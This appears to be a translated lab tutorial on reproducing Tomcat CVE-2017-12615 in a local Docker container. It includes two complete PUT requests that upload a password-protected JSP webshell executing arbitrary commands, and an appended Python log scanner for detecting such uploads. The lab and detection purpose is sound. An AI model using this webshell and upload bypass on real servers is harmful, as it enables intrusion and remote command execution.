Installing Kali and testing CVE-2017-12615
阿新 • Published: 2022-05-09
1 Install Kali
1.1 Download the VMware archive
kali-linux-2022.1
The default username and password are both kali
1.2 Initialize the system
sudo apt update -y #kali
sudo apt install -y sogoupinyin fcitx
sudo dpkg-reconfigure locales #add [x] zh_CN.UTF-8 UTF-8
sudo reboot
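1.3 Install docker
sudo vim /etc/apt/sources.list.d/docker.list #add the following line to the file
deb [arch=amd64] https://download.docker.com/linux/debian buster stable
#apt only accepts this repository once Docker's signing key is trusted
sudo apt update -y
sudo apt install -y docker-ce
1.4 Install docker-compose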
sudo apt install -y docker-compose
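2 Configure the Burp proxy
2.1 Find burpsuite in the applications menu
2.2 Add a proxy under proxy->options
2.3 In the browser, add a proxy and enter the proxy address that Burp opened
2.4 Add Burp's certificate to the browser
3 Set up the CVE-2017-12615 environment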
sudo docker run -it -p 8080:8080 cved/cve-2017-12615 bash #kali
root@cac77cc04871:/usr/local/tomcat# bin/catalina.sh start #do not close this window for now
4 Test
First visit the site in the browser
firefox http://127.0.0.1:8080
In Burp, look at the HTTP history under Proxy to confirm that the proxy is working
Then open Burp's Repeater and edit the request
PUT /1.jsp::$DATA HTTP/1.1
Host: 192.168.144.128:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 659

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("password"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
-------------------------------------------------------------------------------------------------------
PUT /2.jsp/ HTTP/1.1
Host: 192.168.144.128:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 664

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("password"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
Send the request
http://127.0.0.1:8080/2.jsp?cmd=whoami&password=023 #if it works, the system user is returned
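A defender's view of the two PUT requests above, as an added example that is not part of the original post: it scans Tomcat access-log lines and flags PUT requests whose path resolves to a .jsp file once a trailing / or ::$DATA is removed. The log format (AccessLogValve "common" pattern), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed format: Tomcat AccessLogValve "common" pattern, %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Suffixes used in the two requests above to get past the JSP servlet mapping.
BYPASS_SUFFIXES = ("::$data", "/")
SCRIPT_EXTS = (".jsp", ".jspx")


def classify(line):
    """Return a finding dict for a PUT that targets a JSP file, else None."""
    m = LOG_RE.match(line.strip())
    if not m or m["method"] != "PUT":
        return None
    # Decode percent-escapes so an encoded trailing slash is normalised too.
    path = unquote(m["uri"].split("?", 1)[0]).lower()
    suffix = ""
    for s in BYPASS_SUFFIXES:
        if path.endswith(s):
            path, suffix = path[: -len(s)], s
            break
    if not path.endswith(SCRIPT_EXTS):
        return None
    # 201 Created / 204 No Content mean the server stored the request body.
    written = int(m["status"]) in (201, 204)
    return {"host": m["host"], "uri": m["uri"], "suffix": suffix, "written": written}


# Constructed sample lines (not captured from a real server).
SAMPLE_LOG = """\
172.17.0.1 - - [09/May/2022:10:01:12 +0000] "GET / HTTP/1.1" 200 11230
172.17.0.1 - - [09/May/2022:10:02:40 +0000] "PUT /1.jsp::$DATA HTTP/1.1" 201 -
172.17.0.1 - - [09/May/2022:10:03:05 +0000] "PUT /2.jsp/ HTTP/1.1" 201 -
172.17.0.1 - - [09/May/2022:10:03:30 +0000] "PUT /notes.txt HTTP/1.1" 403 1
172.17.0.1 - - [09/May/2022:10:04:02 +0000] "PUT /3.jsp%2F HTTP/1.1" 400 -
"""


def scan(text):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with written set to True means the server accepted the upload. The durable fix is to leave the DefaultServlet readonly init-param at its default of true and to run a patched Tomcat release.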